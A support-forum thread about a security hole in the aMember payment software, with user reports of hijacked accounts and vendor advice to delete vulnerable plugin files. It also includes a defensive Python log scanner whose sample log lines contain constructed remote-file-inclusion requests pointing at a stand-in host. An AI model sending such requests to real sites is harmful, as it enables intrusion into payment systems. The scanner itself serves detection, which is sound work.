My aMember payment system seems to have been hacked. All the addresses of my customers have been changed to a fake one, and all the passwords were changed too. So my subscribers cannot access the paid site (because their password was changed), and when they request their password to be sent to them, they cannot receive it (because their email address was changed). I contacted the support service about this emergency about 10 hours ago and I still have no answer. I am editing the subscribers' data one by one and sending them a mail to inform them. This is a huge job! I have noticed that the email addresses are still kept in memory in "User Payments/Subscriptions" > Edit. So I would like to know if there is a way to reset every email address automatically instead of manually one by one.
attack
The same thing happened to my membership database yesterday - all the passwords were reset and the email addresses changed. Fortunately I had a back-up of the 6000 plus members but I would like to know how it happened and what can be done to stop this from happening again?
dave
AM version 2.4.1pro
php version 4.4.0
Could you please let all of us know what the problem/resolution is? I'd rather not be hacked as well!
I'm sure the aMember group will have this resolved soon. Everyone who reads this prior to a solution being posted should immediately perform a backup of the aMember tables and disallow changing the password and email fields. Keep an eye on your site and this thread for a posted solution. We'll all hope for a quick and speedy one.
Yes, unfortunately, there is a confirmed security problem in 3.0.8. Please immediately remove the file amember/plugins/payment/manual_cc/config.inc.php from your aMember installation. This problem only affects installations of 3.0.8 (and not earlier). It is only possible to break something if allow_url_fopen and allow_url_include (PHP 5.2+) are enabled in php.ini. In short, any default installation of PHP 5.2 is safe by default; earlier versions of PHP are not protected by default. In any case, if you remove this file, you are OK. Once the file is removed, check your website access log for as long as possible for access to "plugins/payment/manual_cc/config.inc.php". If there was any access, please contact us via helpdesk. We will make an email notice to all customers today.
The problem is more serious than described previously. All customers of aMember must upgrade to 3.0.9 immediately. If upgrade is impossible to do right now, it is necessary to remove the files
amember/plugins/payment/paymenow/config.inc.php
amember/plugins/payment/paymenow/paymenow.inc.php
amember/plugins/payment/paypal_pro/paypal_pro.inc.php
amember/plugins/payment/secpay/secpay.inc.php
amember/plugins/payment/secpay/config.inc.php
amember/plugins/payment/manual_cc/config.inc.php
Not all installations are vulnerable (it depends very much on PHP and server firewall configuration), but it is better to prevent an attack.
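The access-log check requested in the vendor posts above, extended here to all six listed files, can be scripted. This is an added example, not aMember's own code: it assumes the Apache/nginx "combined" log format, and its URL-valued-parameter flag is a heuristic inferred from the allow_url_fopen condition, since the thread names no parameter. The sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Files named in the vendor posts above, relative to the aMember directory.
WATCHED = tuple("/plugins/payment/" + f for f in (
    "paymenow/config.inc.php", "paymenow/paymenow.inc.php",
    "paypal_pro/paypal_pro.inc.php", "secpay/secpay.inc.php",
    "secpay/config.inc.php", "manual_cc/config.inc.php"))

# Combined log format: host ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                     r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
URL_VALUE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.I)

def scan(lines):
    """Return one dict per request that touched a watched plugin file."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in combined format
        raw_path, _, query = m["target"].partition("?")
        # Decode %xx escapes and collapse repeated slashes before matching.
        path = re.sub(r"/+", "/", unquote(raw_path)).lower()
        if not path.endswith(WATCHED):
            continue
        # Assumption: a parameter whose value is itself a URL is what the
        # allow_url_fopen condition points to; the thread names no parameter.
        url_param = any(URL_VALUE_RE.match(v)
                        for _, v in parse_qsl(query, keep_blank_values=True))
        hits.append({"host": m["host"], "time": m["time"], "path": path,
                     "status": int(m["status"]), "url_param": url_param})
    return hits

# Constructed sample lines (documentation addresses, made-up parameter "x").
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [01/Jan/2000:10:01:00 +0000] "GET /amember/plugins/payment/manual_cc/config.inc.php?x=http://example.invalid/a.txt HTTP/1.0" 200 312 "-" "-"',
    '203.0.113.7 - - [01/Jan/2000:10:01:05 +0000] "GET /amember//plugins/payment/secpay/%63onfig.inc.php?x=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.0" 200 298 "-" "-"',
    '198.51.100.23 - - [01/Jan/2000:10:02:00 +0000] "GET /amember/plugins/payment/paypal_pro/paypal_pro.inc.php HTTP/1.1" 404 209 "-" "-"',
    '192.0.2.10 - - [01/Jan/2000:10:03:00 +0000] "GET /amember/plugins/payment/manual_cc/config.inc.php.bak HTTP/1.1" 404 209 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any hit is worth reporting to the helpdesk as the vendor asks; a hit with `url_param` set and a 200 status deserves the closest look. Run it over rotated and archived logs too, not only the current file.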
Hi Alex, I have been waiting for an update for many months now. But it is nice to see that something happened in the area of an update. Well, I see no reason why people should have all those files in the installations anyway. Just delete all the files that you are not using, i.e. payment plugins. I have deleted everything except a free plugin, since I am not using aMember for payment. Not to have files is better than watching which files are vulnerable and making a big list of what not to have.
Thanks, Grant. I finally figured out why the link Alex posted didn't work: the word Security was missing the "U". I can imagine with the rush to get to the bottom of the security issue and make sure it is fixed, he is quite busy, so I am not making a big deal out of it. I deleted the listed files, so hopefully that resolves the issue. I bought aMember because the other payment processing package I had been using was a big problem with security holes that were not being fixed. I am very pleased with the rapid response by aMember to this threat!
attacked?
It looks as though I may have been attacked and the members table has been removed (no recent backups). Is it possible to retrieve anything or do I need to rebuild from scratch?
You should send in a ticket to Alex. BTW, some hosts keep nightly backups, you might get lucky!
David
Thank you. I got a backup from my host. My backup was corrupted - lesson learnt: make 2 backups. Alex has been of great assistance in getting everything back on track. I have made the necessary security patches/changes.